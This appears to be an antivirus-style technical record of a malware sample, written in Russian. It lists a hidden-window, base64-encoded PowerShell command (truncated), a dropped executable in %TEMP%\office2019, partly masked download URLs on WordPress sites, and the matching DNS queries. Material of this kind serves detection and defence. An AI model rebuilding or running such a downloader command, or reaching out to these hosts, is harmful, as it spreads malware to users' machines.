Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABCAGwAOQAxAG0AdABwAD0AKAAnAFoAJwArACcAaABnADAAZgA3ACcAKwAnADgAJwApADsALgAoACcAbgBlAHcALQBpAHQAJwArACcAZQBtACcAKQAgACQAZQBuAHYAOgBUAGUAbQBwAFwATwBGAEYAaQBDAGUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH...
- %TEMP%\office2019\y96kxi.exe
- %TEMP%\office2019\y96kxi.exe
- http://we###dfuse.com/wp-content/l/
- http://we###dfuse.com/wp-admin/setup-config.php
- http://in###nix.com/bteag/zEx/
- http://x.##2.us/x.cer
- http://bl##.hlwen.com/home/U/
- http://am##-py.com/amvp/WZA/
- DNS ASK we###dfuse.com
- DNS ASK in###nix.com
- DNS ASK x.##2.us
- DNS ASK bl##.hlwen.com
- DNS ASK mi##dev.net
- DNS ASK am##-py.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABCAGwAOQAxAG0AdABwAD0AKAAnAFoAJwArACcAaABnADAAZgA3ACcAKwAnADgAJwApADsALgAoACcAbgBlAHcALQBpAHQAJwArACcAZQBtACcAKQAgACQAZQBuAHYAOgBUAGUAbQBwAFwATwBGAEYAaQBDAGUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH...' (со скрытым окном)